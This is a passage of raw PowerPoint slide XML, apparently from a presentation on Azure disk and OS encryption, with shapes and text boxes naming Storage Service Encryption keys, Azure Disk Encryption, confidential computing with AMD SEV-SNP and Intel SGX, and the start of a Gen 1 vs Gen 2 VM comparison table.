          <a:xfrm>
            <a:off x="10082637" y="4111332"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Picture 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9945CE1D-5DC2-4AC2-8A2A-EDEEC8207D9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320588" y="4044285"/>
            <a:ext cx="552450" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Picture 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFD9BE5-5956-415E-9C65-33DC70105746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8739679" y="5244824"/>
            <a:ext cx="666750" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04815D1A-29D6-44FB-A6D4-37FFEC721959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="4663479"/>
            <a:ext cx="25984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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="12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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="1200" b="1"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813D3809-EA91-475F-BAA4-F44BEDCE8CF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9398000" y="5431539"/>
            <a:ext cx="609600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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Customer Managed Keys</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955E92B5-6CF2-4BF1-A43C-376010153C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1118602" y="327049"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Disk Encryption</a:t>
            </a:r>
            <a:endPar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5077CF9-9AC2-49D8-9B89-BAF58524961A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875921" y="3188369"/>
            <a:ext cx="23160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rPr>
              <a:t>Or...</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00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p:bldP spid="52" grpId="0"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26311BAF-DE06-4A8F-82CB-4FE6405FAF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8889738" y="2419348"/>
            <a:ext cx="2866369" cy="1802561"/>
          </a:xfrm>
          <a:prstGeom prst="round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90B86A8-EE27-4275-8130-A58DB995A99A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9163735" y="2643015"/>
            <a:ext cx="2425415" cy="730205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63FF5CA-EE6B-4581-8D36-8253D0F65E9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10082637" y="2834230"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Storage Disk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle: Rounded Corners 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0CB7DC-8FE7-4153-A94A-820604DE0679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196950" y="1212850"/>
            <a:ext cx="2369802" cy="3851025"/>
          </a:xfrm>
          <a:prstGeom prst="round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227CC26D-122C-45DB-BF51-39C27532617C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381142" y="1625600"/>
            <a:ext cx="1585399" cy="1800247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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E7E6E6">
                  <a:lumMod val="25000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4FDE905-C2AB-4AAF-87F4-CA6AB3E7F250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500558" y="2733286"/>
            <a:ext cx="704850" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TekstSylinder 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{718C8F28-016F-458B-B0F3-7F928752872B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314296" y="2868221"/>
            <a:ext cx="128166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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VM01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B444A7BC-0021-4038-9342-BE726DC5938A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9320588" y="2767183"/>
            <a:ext cx="552450" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Arrow: Right 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00D8B663-50A6-426A-BFFA-F157974BDF3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6999435" y="2583810"/>
            <a:ext cx="2085360" cy="861772"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Read/Write </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5759A1CA-A45B-4A6C-A707-1B47AC43EDEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8597923" y="3409881"/>
            <a:ext cx="666750" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1527CF46-AE58-4793-B1CA-6385E4870F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262414" y="3386377"/>
            <a:ext cx="25984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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SSE </a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="12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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Storage Service Encryption)</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="12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nb-NO" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Platform Managed Keys</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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B931ECE-8DB7-4C95-BA69-084BBE47421A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653713" y="1149074"/>
            <a:ext cx="4195013" cy="5067910"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Azure Disk Encryption for encryption of VHD files and OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Adds 3 – 5% CPU usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Confidential Computing for encryption of working memory of the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>AMD SEV-SNP or Intel SGX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Intel SGX requires rewriting of applications to use new CPU instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>AMD SEV-SNP does not require modifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rectangle 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA8D8FC-ABC3-4D56-9637-69DE3ED1B94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5446929" y="4202102"/>
            <a:ext cx="1906817" cy="636813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="0A1B3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4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AMD SEV-SNP</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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br>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" sz="14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Confidential Computing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Arrow: Right 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DD5D8E-99AA-4697-8E55-505326D5D4E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="5467491" y="3638276"/>
            <a:ext cx="685799" cy="381548"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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6926F334-6058-4C29-B162-8862737CD498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5461000" y="1825625"/>
            <a:ext cx="800100" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A75D4BA-4DED-4A66-A791-7DBFF9871A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235700" y="1847850"/>
            <a:ext cx="7112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200" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Minne</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95FC9608-8226-49C2-BAF2-C1B0A7097742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5664200" y="1238250"/>
            <a:ext cx="15684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Kryptert miljø</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BB13D8A1-5A4E-4302-96D0-7A5F9A2C9160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250950" y="314349"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Disk and OS Encryption</a:t>
            </a:r>
            <a:endPar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 name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3E2703E-2F60-40A5-B06F-E8CDB5D108D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7770139" y="2233441"/>
            <a:ext cx="666750" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B16BB8F-E96C-451F-882B-2E036018B2BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7815160" y="1907741"/>
            <a:ext cx="15788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ADE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7812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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458744" y="266891"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Gen 1 vs Gen 2 - VM</a:t>
            </a:r>
            <a:endPar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6" name="Table 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCFE332-D44D-4294-8666-8523C2E6EF92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5058945" y="1450250"/>
          <a:ext cx="6286500" cy="3708400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1663699">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3333502870"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2247900">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="946069980"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2374901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2196946750"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
                        <a:t>Feature</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
                        <a:t>Generation 1 VM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" dirty="0"/>
                        <a:t>Generation 2 VM</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
